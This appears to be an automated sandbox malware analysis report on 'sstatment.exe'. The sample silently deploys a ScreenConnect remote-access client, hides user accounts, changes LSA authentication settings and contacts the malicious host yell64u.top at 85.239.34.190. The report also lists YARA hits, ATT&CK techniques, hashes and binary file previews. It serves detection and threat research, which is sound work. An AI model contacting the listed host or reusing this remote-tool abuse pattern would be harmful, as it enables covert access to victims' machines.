                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05351348 CreateNamedPipeW,7_2_05351348
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_01374D30 RtlGetVersion,7_2_01374D30
                              Source: C:\Users\user\Desktop\sstatment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                              Source: Yara matchFile source: sstatment.exe, type: SAMPLE
                              Source: Yara matchFile source: 8.2.ScreenConnect.WindowsClient.exe.2f0fa20.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.sstatment.exe.54e0000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 8.0.ScreenConnect.WindowsClient.exe.b50000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.sstatment.exe.54e0000.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.sstatment.exe.ac5db8.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.31efa60.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.sstatment.exe.a163d8.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.sstatment.exe.a9c3d8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.sstatment.exe.a00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.1716168698.00000000054E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000008.00000002.2951121730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1703239568.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: sstatment.exe PID: 4320, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3332, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7308, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7424, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Windows\Installer\MSI3407.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Config.Msi\5e3177.rbs, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Valid Accounts
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomains1
                              Replication Through Removable Media
                              1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Valid Accounts
                              1
                              Valid Accounts
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron2
                              Windows Service
                              1
                              Access Token Manipulation
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture1
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd1
                              Bootkit
                              2
                              Windows Service
                              1
                              DLL Side-Loading
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts13
                              Process Injection
                              1
                              DLL Search Order Hijacking
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              File Deletion
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                              Masquerading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              Valid Accounts
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd51
                              Virtualization/Sandbox Evasion
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                              Process Injection
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Hidden Users
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                              Bootkit
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                              Rundll32
                              Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534362 Sample: sstatment.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 42 55 yell64u.top 2->55 61 .NET source code contains potential unpacker 2->61 63 .NET source code references suspicious native API functions 2->63 65 Detected potential unwanted application 2->65 67 3 other signatures 2->67 8 msiexec.exe 94 51 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 sstatment.exe 5 2->15         started        signatures3 process4 dnsIp5 35 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->35 dropped 37 C:\...\ScreenConnect.ClientService.exe, PE32 8->37 dropped 39 C:\...\ScreenConnect.WindowsClient.exe.config, XML 8->39 dropped 43 10 other files (none is malicious) 8->43 dropped 73 Enables network access during safeboot for specific services 8->73 75 Modifies security policies related information 8->75 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        57 yell64u.top 85.239.34.190, 49731, 8880 RAINBOW-HKRainbownetworklimitedHK Russian Federation 12->57 77 Reads the Security eventlog 12->77 79 Reads the System eventlog 12->79 23 ScreenConnect.WindowsClient.exe 3 12->23         started        26 ScreenConnect.WindowsClient.exe 2 12->26         started        41 C:\Users\user\AppData\...\sstatment.exe.log, ASCII 15->41 dropped 81 Contains functionality to hide user accounts 15->81 28 msiexec.exe 6 15->28         started        file6 signatures7 process8 file9 31 rundll32.exe 11 17->31         started        69 Creates files in the system32 config directory 23->69 71 Contains functionality to hide user accounts 23->71 45 C:\Users\user\AppData\Local\...\MSI2C46.tmp, PE32 28->45 dropped signatures10 process11 file12 47 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 31->47 dropped 49 C:\...\ScreenConnect.InstallerActions.dll, PE32 31->49 dropped 51 C:\Users\user\...\ScreenConnect.Core.dll, PE32 31->51 dropped 53 4 other files (none is malicious) 31->53 dropped 59 Contains functionality to hide user accounts 31->59 signatures13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2C46.tmp0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Windows\Installer\MSI3417.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI367A.tmp0%ReversingLabs
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              yell64u.top
                              85.239.34.190
                              truetrue
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://wixtoolset.org/releases/rundll32.exe, 00000004.00000003.1709211710.0000000004773000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                  unknown
                                  http://wixtoolset.org/news/rundll32.exe, 00000004.00000003.1709211710.0000000004773000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000007.00000002.2953487758.00000000016CA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000004.00000003.1709211710.0000000004773000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                      unknown
                                      https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.2.drfalse
                                        unknown
                                        https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          85.239.34.190
                                          yell64u.topRussian Federation
                                          134121RAINBOW-HKRainbownetworklimitedHKtrue
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1534362
                                          Start date and time:2024-10-15 19:19:07 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 5s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:14
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:sstatment.exe
                                          Detection:MAL
                                          Classification:mal42.evad.winEXE@17/56@1/1
                                          EGA Information:
                                          • Successful, ratio: 60%
                                          HCA Information:
                                          • Successful, ratio: 65%
                                          • Number of executed functions: 182
                                          • Number of non-executed functions: 4
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target rundll32.exe, PID 3332 because it is empty
                                          • Execution Graph export aborted for target sstatment.exe, PID 4320 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          • VT rate limit hit for: sstatment.exe
                                          No simulations
                                          No context
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          RAINBOW-HKRainbownetworklimitedHKaa.LnK.lnkGet hashmaliciousUnknownBrowse
                                          • 102.165.46.145
                                          lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                                          • 85.239.52.252
                                          lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                                          • 85.239.52.252
                                          nPyo7vtpRl.dllGet hashmaliciousUnknownBrowse
                                          • 45.86.230.68
                                          rdl3kBqbTy.dllGet hashmaliciousUnknownBrowse
                                          • 45.86.230.68
                                          nPyo7vtpRl.dllGet hashmaliciousUnknownBrowse
                                          • 45.86.230.68
                                          rdl3kBqbTy.dllGet hashmaliciousUnknownBrowse
                                          • 45.86.230.68
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 85.239.52.241
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 85.239.52.241
                                          Havarti.dllGet hashmaliciousUnknownBrowse
                                          • 45.86.230.68
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllextukGiBrn.exeGet hashmaliciousScreenConnect ToolBrowse
                                            Vh0tTzx4Ko.exeGet hashmaliciousScreenConnect ToolBrowse
                                              support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                    ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                      Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        E_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dllextukGiBrn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                Vh0tTzx4Ko.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                  support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                          Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                            E_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                              Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):219646
                                                                                  Entropy (8bit):6.582047759845621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:MZ9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGJ:MZuH2aCGw1ST1wQLdqvJ
                                                                                  MD5:3637CC2691045F04C0400CC44CFE5DEA
                                                                                  SHA1:9C067384D41371EF4891F4C07766478ABD3314C1
                                                                                  SHA-256:6D00D81062F070C66E9EB90A99BF085D6F121F0EF40B5D3ADD8476365E6E29A4
                                                                                  SHA-512:1B7BBC7C783490E262985630708A9CDEF1C2D8071EFCC24C5613F4787E247F4759785357DCE40A97D16C80CCC2554931F2DD826D8D575731BF17302CF8EDADED
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\5e3177.rbs, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Preview:...@IXOS.@.....@.jOY.@.....@.....@.....@.....@.....@......&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.@......&.{E2565D0B-BCDD-C1A1-A2A2-7660FC61A23D}&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.@......&.{A9BEA7A3-6285-A159-CBF3-596C269E6678}&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.@......&.{567A6AC5-C59B-6D1E-4D5E-D3E6B358A6AB}&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.@....
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):4.646296001566109
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                                                  MD5:8B45555EF2300160892C25F453098AA4
                                                                                  SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                                                  SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                                                  SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):21018
                                                                                  Entropy (8bit):7.841465962209068
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                                                  MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                                                  SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                                                  SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                                                  SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):50133
                                                                                  Entropy (8bit):4.759054454534641
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                  MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                  SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                  SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                  SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                  Malicious:false
